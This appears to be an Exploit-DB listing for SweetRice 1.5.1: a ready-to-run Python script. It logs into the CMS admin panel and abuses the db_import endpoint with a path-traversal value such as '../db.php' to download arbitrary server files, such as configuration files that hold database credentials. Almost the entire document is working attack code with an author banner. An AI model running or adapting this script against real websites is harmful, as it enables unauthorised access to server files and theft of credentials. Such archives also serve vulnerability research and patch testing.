SweetRice 1.5.1 - Arbitrary File Download

EDB-ID:

40698

CVE:

N/A

Platform:

PHP

Published:

2016-11-03

#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
    pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                    |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Local File Inclusion                            |
|    > Script Cod3r : Ehsan Hosseini                                    |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")

userinfo = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}

with session() as r:
    login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if login.text.find(success) > 1:
            print("[+] Login Succssfully...")
        else:
            print("[-] User or Pass is incorrent...")
            print("Good Bye...")
            exit()
            pass
        pass
    dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')

    if dlfile.status_code == 200:

        print('[+] Exploit...')
        file = open(xplfile, "w")
        file.write(dlfile.text)
        file.close()
        print('[+] File Saved...')
        print('[+] Exploit By Ehsan Hosseini')
    else:
        print("[-] Error in Exploting...")
        pass